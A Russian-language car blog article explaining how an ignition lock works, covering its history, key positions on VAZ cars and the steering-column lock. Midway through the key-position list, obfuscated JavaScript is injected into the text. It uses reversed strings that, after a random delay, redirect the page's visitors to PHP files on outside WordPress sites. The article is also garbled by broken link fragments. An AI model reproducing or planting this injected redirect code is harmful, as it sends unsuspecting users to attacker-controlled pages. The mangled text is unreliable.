
Замок зажигания: что происходит когда мы поворачиваем ключ?
Рад Вашему посещению, дорогой друг! Продолжаем изучать устройство автомобилей и сегодня у нас принцип работы замка зажигания. «Мал, да удал», — гласит пословица, и она как нельзя лучше описывает героя этой статьи. Речь, как вы поняли, о замке зажигания.
Каков же принцип работы замка зажигания?
Начнём, как всегда, с небольшого экскурса в историю и теорию. Для чего мы поворачиваем ключ в этом устройстве?
Главная причина – желание запустить двигатель, который начинает работу to-takoe-starter-v-avtomobile.html» target=»_blank» rel=»noopener»>при помощи стартера. Именно на это устройство подаётся электрический ток через ЗЗ, как через ворота, от tor.html» target=»_blank» rel=»noopener»>аккумулятора.
На заре автомобилестроения стартеров не существовало, поэтому отсутствовала необходимость и в замках зажигания. Мотор заводили вручную специальным металлическим штырём, и, понятное дело, такой процесс вряд ли можно было назвать удобным и лёгким.
Кстати, как альтернатива, этот метод запуска силового агрегата был доступен на отечественных авто почти до 90-х годов минувшего столетия.
Что же касается электрических стартеров, то они начали появляться в начале ХХ века, а с ними и замки зажигания. Изначально ключи к ним были лишь формальностью, дающей возможность повернуть замок зажигания, но с ростом числа транспортных средств, росло и число людей, которые любили «покататься» на чужих авто.
Поэтому довольно скоро замки зажигания стали не только частью системы запуска машины, а ещё и противоугонным элементом.
Принцип работы замка зажигания ВАЗов: особенности и нюансы
Рассмотреть алгоритм работы ЗЗ проще всего на основе любимого нами отечественного автопрома. Принцип работы замка зажигания ВАЗ 2110 или какой-либо другой модели Волжского автозавода идентичны, меняется лишь схема устройства и то не радикально.
Как правило, ключ может находиться в трёх положениях:
- 0 – практически все $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovaniya-avtomobilya.html» target=»_blank» rel=»noopener»>потребители электроэнергии в машине отключены, только в этой позиции можно вынуть и вставить ключ;
- I – в этом положении к аккумулятору подключаются различные приборы, например, можно включить фары, магнитолу, дворники и прочее, ключ может находиться в этом положении фиксировано и не вынимается;
- II – наверное, самое главное положение, так как оно активирует to-takoe-starter-v-avtomobile.html» target=»_blank» rel=»noopener»>стартер двигателя. При переводе в эту позицию, ключ затем сам возвращается в I.
В более старых моделях, так называемой «классике», может встречаться ещё одно положение замка, маркированное как «III». В нём происходит механическая блокировка рулевой колонки.